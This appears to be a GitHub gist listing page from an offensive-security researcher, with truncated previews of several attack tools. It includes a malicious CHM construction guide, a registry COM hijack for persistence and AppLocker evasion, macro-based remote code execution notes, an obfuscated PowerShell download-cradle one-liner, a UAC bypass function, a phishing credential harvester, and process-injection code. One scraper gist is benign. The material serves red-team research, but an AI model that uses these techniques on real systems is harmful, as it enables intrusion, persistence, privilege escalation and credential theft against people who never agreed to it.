Mariusz Banach mgeeky

💭
Wanna sip a sencha?
  • Binary-Offensive.com
  • Poland
  • X @mariuszbit
@mgeeky
mgeeky / collect-gpw.py
Last active February 22, 2024 21:44
Script that collects data from GPW (Warsaw Stock Exchange) and correlates it with stock details retrieved from Money.pl quotes. As a result two CSV files will be generated: one with full results, and a second with results filtered by B. Graham's conditions.
#!/usr/bin/python
#
# Script that fetches the current indicators of companies from the GPW site,
# then for each company loads the parameters of its quotes and shares
# from the Money.pl site. The result is two CSV files ready to be imported
# and processed in Excel. The first file, out.csv, contains all company data; the second,
# csv_filtered, contains data filtered by the strict criteria of Benjamin Graham,
# author of The Intelligent Investor.
#
@mgeeky
mgeeky / ascii-shellcode-encoder.py
Last active February 10, 2024 20:50
ASCII shellcode encoder for exploit development purposes, utilizing Jon Erickson's subtract-arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging the rebuild-on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs' `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives the program a binary-encoded shellcode on its input,
# and it yields the shellcode's ASCII-encoded form on the output.
#
# This payload will at the beginning align the stack by firstly moving
@mgeeky
mgeeky / Malicious-CHM-Guide.md
Created February 6, 2018 13:52
Cheat sheet describing how to create a malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within the "docs" directory and insert the following code into its <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
@mgeeky
mgeeky / slmgr-com-hijack.reg
Last active January 24, 2024 16:19
Example presenting how to hijack the COM object named "Scripting.Dictionary", used by slmgr.vbs (CreateObject("Scripting.Dictionary")), in order to obtain persistence or evade command-line logging and AppLocker.
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
@mgeeky
mgeeky / Various-Macro-Based-RCEs.md
Last active January 14, 2024 16:43
Various Visual Basic macro-based remote code execution techniques to get your Meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macro construction strategies that could be used for remote code execution via the malicious document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glance before setting a payload.

All of the examples below were generated using 192.168.56.101 as the remote address.

List:

  1. Page substitution macro for luring the user to click Enable Content
  2. The Unicorn Powershell based payload
@mgeeky
mgeeky / Download-Cradles-Oneliners.md
Last active January 8, 2024 14:06
Various PowerShell download cradles intended as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor, handy for dynamic string deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@mgeeky
mgeeky / uac-silentcleanupbypass.ps1
Created May 12, 2021 01:09
UAC Bypass: SilentCleanup (Win10 1903+). Leaves powershell.exe running with nasty command line: (powershell -w hidden -c "& 'C:\your\evil\command.exe'";#\system32\werfault.exe)
function UAC-SilentCleanupBypass {
param(
[Parameter(Mandatory = $True)]
[String]$Command
)
$assemblies=(
"System"
)
@mgeeky
mgeeky / post.php
Last active December 27, 2023 07:40
(Gist discontinued, for the recent version check: https://github.com/mgeeky/PhishingPost ) PHP credentials harvesting script to be used during social engineering phishing campaigns/projects.
<?php
/*
* PHP script intended to be used during phishing attempts as a harvester
* collector linked to a backdoored HTML <form> action parameter. Such an action
* parameter could be set like this:
*
* <form [...] action="/post.php" [...]>
*
* and the script named 'post.php' to get it working. Additional configuration
* can be made in the section below.
@mgeeky
mgeeky / _notes.md
Created June 6, 2023 21:09 — forked from djhohnstein/_notes.md
AppDomainManager Injection

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed; they do this by matching Original Filename to Process Name.

In this example, we don't have to rename anything. We simply coerce a trusted signed app to load our assembly.

We do this by directing the application to read a config file we provide.

@mgeeky
mgeeky / Source.cpp
Created May 9, 2023 22:12 — forked from alfarom256/Source.cpp
Thread Execution via NtCreateWorkerFactory
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // LARGE_INTEGER